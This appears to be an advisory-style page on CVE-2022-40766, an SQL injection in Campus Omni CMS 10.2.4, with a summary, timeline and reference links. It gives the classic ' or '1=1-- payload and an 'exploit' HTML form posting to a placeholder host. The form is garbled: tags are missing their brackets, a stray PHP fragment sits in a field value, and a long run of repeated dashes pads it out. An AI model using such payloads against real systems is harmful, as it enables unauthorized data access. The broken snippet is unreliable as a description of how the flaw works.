CVE-2022-40766 An attack in Campus Omni CMS 10.2.4 allows SQL injection via a ' or '1=1--' substring.

The injection occurs in the 'Users' page, in the 'Create' field. The following code can be used to exploit this vulnerability: p>strong>SQL Injection in the 'Create' field on the 'Users' page in 'Campus Omni 10.2.4'/strong>/p> form method="post" action="http://HOST/OUCAMP/index.php/camps/active/"> p>strong>Field:/strong>  select name="CREATE_ON" dataType="VARCHAR" size="50">  option value="1" selected="">-- SQL Injection: ?php -- 'OR 1=1 -- - ' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --

Vulnerability summary

A vulnerability was found in 'Campus Omni 10.2.4' that can be exploited by user inputting malicious code into the field named 'CREATE_ON'.

Timeline

Published on: 09/18/2022 05:15:00 UTC
Last modified on: 09/21/2022 06:23:00 UTC

References

• https://gist.github.com/Mr-Akuma/8d84b564fb051caa1b1ea31b24f6b9fb
• https://moderncampus.com/products/web-content-management.html
• https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-40766